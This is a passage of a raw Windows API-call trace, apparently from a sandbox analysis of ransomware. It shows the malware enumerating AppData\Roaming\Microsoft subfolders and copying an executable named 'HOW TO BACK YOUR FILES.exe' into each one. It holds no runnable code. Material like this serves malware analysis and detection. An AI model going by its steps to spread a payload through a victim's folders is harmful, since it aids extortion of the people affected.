lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x507f7a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x507f7a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.215] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.215] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.216] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0109.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0109.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0109.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 77 [0109.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0109.216] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.216] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.216] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.217] GetLastError () returned 0x0 [0109.217] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.217] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.217] CloseHandle (hObject=0x120) returned 1 [0109.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.217] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.217] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x507f7a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x507f7a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.217] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.217] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.217] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0109.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3251d8 | out: hHeap=0x2b0000) returned 1 [0109.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0109.217] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 82 [0109.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0109.217] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.217] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.218] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.218] GetLastError () returned 0x0 [0109.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.218] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.218] CloseHandle (hObject=0x120) returned 1 [0109.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.219] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x507f7a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x507f7a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.219] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.219] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.219] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0109.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x325128 | out: hHeap=0x2b0000) returned 1 [0109.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0109.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 82 [0109.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0109.219] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.219] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.220] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.220] GetLastError () returned 0x0 [0109.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.220] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.220] CloseHandle (hObject=0x120) returned 1 [0109.220] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.220] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.220] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50843ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50843ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.220] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.220] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.221] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0109.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0109.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0109.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 90 [0109.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0109.221] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.221] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.221] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.222] GetLastError () returned 0x0 [0109.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.222] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.222] CloseHandle (hObject=0x120) returned 1 [0109.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.222] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.222] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50843ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50843ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.222] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.222] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.222] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech" [0109.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0628 | out: hHeap=0x2b0000) returned 1 [0109.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0109.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech") returned 62 [0109.222] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech" [0109.222] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.222] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.223] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.223] GetLastError () returned 0x0 [0109.223] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.223] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.223] CloseHandle (hObject=0x120) returned 1 [0109.223] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.224] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.224] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50843ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50843ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.224] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.224] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.224] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0109.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x325078 | out: hHeap=0x2b0000) returned 1 [0109.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0109.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned 81 [0109.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0109.224] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.224] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.225] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.225] GetLastError () returned 0x0 [0109.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.225] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.225] CloseHandle (hObject=0x120) returned 1 [0109.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.225] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.225] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x50869e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50869e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.225] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.225] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.226] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher" [0109.226] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0109.226] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0109.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher") returned 65 [0109.226] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher" [0109.226] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.226] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.226] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.227] GetLastError () returned 0x0 [0109.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.227] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.227] CloseHandle (hObject=0x120) returned 1 [0109.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.227] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.227] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x50869e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50869e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.227] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.227] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.227] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect" [0109.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0738 | out: hHeap=0x2b0000) returned 1 [0109.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0109.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect") returned 63 [0109.227] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect") 